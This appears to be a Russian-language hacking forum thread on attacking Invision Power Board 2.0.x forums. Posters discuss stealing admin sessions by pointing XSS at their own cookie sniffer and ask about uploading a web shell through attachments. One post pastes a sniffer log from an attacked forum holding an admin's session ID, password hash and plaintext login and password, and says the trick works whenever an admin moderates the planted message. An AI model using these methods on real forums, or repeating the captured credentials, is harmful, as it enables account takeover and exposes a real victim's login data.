как получить админские сессии в Ipb 2.0.4?

Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)

 

Там проблема в другом была.Спасибо,уже разобрался.

 

а кто нибудь пробовал чтонибудь делать с аттачментами, которые пишутся в папку uploads? там проблема в том, что расширение мняется или в чем то еще? это я к тому что можно ли както аттачментом залить шелл, а потом его както использовать?

 

АХТУНГ!!!

Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли
куки админа, содержащие логин и пасс в ОТКРЫТОМ виде. (Атаковался IPB 2.0.1)
-------------------------------------

Code:

IP: *.*.*.100 
REFERER: http://***/forum/index.php?showtopic=175&st=80
QUERY: 69&member_id=1; pass_hash=f8447ce02eba492abe3249294aed4bf4;
forum_read=a:10:
{i:3;i:1134211808;i:2;i:1134174577;i:8;i:1134218332;i:
11;i:1134081264;i:13;i:1133595567;i:7;i:1133683890;i:
12;i:1133683875;i:10;i:1134174724;i:5;i:1133951226;i:
6;i:1134221372;}; 
acpcollapseprefs=100,200,900,1400; anonlogin=-1;
topicmode=linear; [COLOR=DarkOrange]slogin=ariman;spass=tornado[/COLOR]; 
session_id=dcbf597a8db2190e362cf4ffd8b15dcb; 
modtids=,; topicsread=a:1:{i:175;i:1134231356;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1; SV1)

-------------------------------------
Как так получилось? Ответ:
В том случае если админ лезет модерировать форум и видит вашу мессагу,
к вам придет логин и пасс в открытом виде.
Проверено-канает.